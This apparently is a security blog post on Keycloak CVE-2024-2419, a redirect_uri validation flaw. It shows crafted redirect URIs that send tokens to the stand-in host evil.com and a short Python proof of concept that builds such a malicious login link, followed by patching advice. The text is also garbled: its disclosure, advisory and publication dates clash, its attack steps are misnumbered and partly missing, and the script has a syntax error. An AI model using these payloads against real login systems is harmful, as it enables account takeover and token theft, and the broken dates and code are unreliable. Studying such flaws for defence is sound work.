Keycloak is a pretty popular open-source identity and access management tool, commonly used to handle login and single sign-on (SSO) for web applications. Security is key for these systems, but on January 19, 2024, a new vulnerability was revealed: CVE-2024-2419, a redirect URI validation flaw. This bug allows attackers to trick Keycloak into sending tokens to *unauthorized* domains, putting users at risk of account takeover.

In this post, we’ll break down what CVE-2024-2419 is, how it works, show some sample exploit code, and provide ways to protect your applications.

1. What Is CVE-2024-2419?

CVE-2024-2419 is a security issue in Keycloak’s redirect_uri validation logic. Normally, when Keycloak is set up for OAuth2 or OIDC flows, you must tell it exactly where it should redirect users after they log in. This is to prevent attackers from sending users (and their tokens) somewhere malicious.

But due to a flaw—very similar to last year’s CVE-2023-6291—an attacker can craft a special redirect URI that is technically accepted by Keycloak, even though it points to an unexpected or malicious host. If they trick a user into logging in, the user’s access token could be sent to the attacker, allowing them to impersonate the victim.

Official advisory:
- Keycloak Security Advisory 2024-03-11 / CVE-2024-2419
- GitHub Advisory on CVE-2024-2419

Suppose you allow only these URIs for redirecting after login

https://mytrustedapp.com/callback

However, due to faulty validation, Keycloak might accept URIs like

https://mytrustedapp.com%40evil.com/callback

Or even craftier ones using encoded (or special) characters

https://mytrustedapp.com@evil.com/callback
https://mytrustedapp.com.evil.com/callback

Depending on the validation, mytrustedapp.com@evil.com is *actually* interpreted by browsers as going to evil.com, but Keycloak saw it as matching the mytrustedapp.com prefix.

`

https://auth.keycloak.com/auth?client_id=myclient&redirect_uri=https://mytrustedapp.com@evil.com/callback

Keycloak recognizes the redirect_uri as a valid one for the client.

4. After login, Keycloak redirects the victim (including the access token) to https://mytrustedapp.com@evil.com/callback

4. Example Exploit Script

Here’s a simple Python PoC showing how an attacker could automate the construction of a malicious login link targeting Keycloak before the patch:

import urllib.parse

# Assuming attacker knows the real redirect_uri
real_redirect_uri = "https://mytrustedapp.com/callback"

# Attacker crafts a malicious host (e.g., evil.com)
malicious_host = "evil.com"
malicious_redirect = (
    real_redirect_uri.replace("mytrustedapp.com", "mytrustedapp.com@" + malicious_host)
)

# URL-encode for browser safety
malicious_redirect_encoded = urllib.parse.quote(malicious_redirect, safe='')

login_url = (
    "https://auth.keycloak.com/auth?";
    "client_id=myclient&"
    f"redirect_uri={malicious_redirect_encoded}&"
    "response_type=code"
)

print("Malicious login URL:", login_url)

## 5. How to Fix / Mitigate

Upgrade!

If your Keycloak version is affected (see GitHub advisory for versions), upgrade to a patched release immediately.

Strict URI Validation

- Ensure redirect URIs are fully verified and do not allow usernames, encoded characters, or wildcards.

Prefer full hostname matching, not string comparison.

- Consider using Public Suffix List to separate real domains from subdomain tricks.

6. References & Further Reading

- Keycloak Security Advisory 2024-03-11
- GitHub Security Advisory GHSA-fv2g-2f9p-57g2
- NVD Entry CVE-2024-2419
- CVE-2023-6291 Details—Similar Vulnerability

7. Summary

CVE-2024-2419 shows once again that web authentication is tricky to get right. Even a simple URL parsing bug can put your entire user base at risk. If you run Keycloak, update now, audit your allowed redirect URIs, and always be aware of tricky ways attackers may exploit small validation bugs.

Timeline

Published on: 04/17/2024 14:15:08 UTC
Last modified on: 04/17/2024 16:15:08 UTC